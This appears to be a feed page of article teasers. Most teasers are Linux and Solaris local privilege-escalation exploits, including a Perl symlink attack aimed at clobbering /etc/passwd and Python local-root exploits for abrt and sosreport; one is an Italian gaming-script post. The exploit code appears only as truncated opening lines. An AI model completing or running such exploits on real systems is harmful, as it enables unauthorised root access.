Solaris 10 Patch Cluster Symlink Attack
#!/usr/bin/perl $clobber = "/etc/passwd"; while(1) { open ps,"ps -ef | grep -v grep |grep -v PID |"; while(<ps>) { @args = split " ", $_; if (/inetd-upgrade/) { print "Symlinking...
View ArticleClik here to view.
Gaming su Ubuntu: Script per minimizzare l’uso di risorse
+ Oggi voglio spiegarvi come impostare uno script che passi da un desktop pieno di applicazioni e con il compositing attivato a un desktop dall’aspetto minimale, utile per limitare il consumo di...
View ArticleLinux Abrt / Apport Race Condition / Symlink
Hello, this is CVE-2015-1318 and CVE-2015-1862 (essentially the same bugs in two different implementations, apport and abrt respectively). These were discussed on the vendors list last week. If the...
View ArticleClik here to view.
CentOS 7.1 / Fedora 22 abrt Local Root
#!/usr/bin/python # CVE-2015-5273 + CVE-2015-5287 # CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too) # abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo...
View ArticleRHEL 7.0 / 7.1 abrt / sosreport Local Root
#!/usr/bin/python # CVE-2015-5287 (?) # abrt/sosreport RHEL 7.0/7.1 local root # rebel 09/2015 # [user@localhost ~]$ python sosreport-rhel7.py # crashing pid 19143 # waiting for dump directory #...
View Article
